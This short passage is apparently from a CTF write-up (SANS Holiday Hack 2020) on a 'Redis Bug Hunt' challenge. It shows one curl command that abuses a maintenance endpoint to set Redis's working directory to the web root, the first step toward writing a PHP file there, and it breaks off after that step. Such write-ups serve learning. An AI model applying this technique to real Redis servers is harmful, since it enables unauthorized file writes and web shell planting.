joergschwarzwaelder/hhc2020/Additional/Redis Bug Hunt.md

 The objective is to retrieve the index.php file from the server.

+## Approach 1: Pushing a PHP file into the Web Tree
 This can be done using these commands:
 ```
 curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html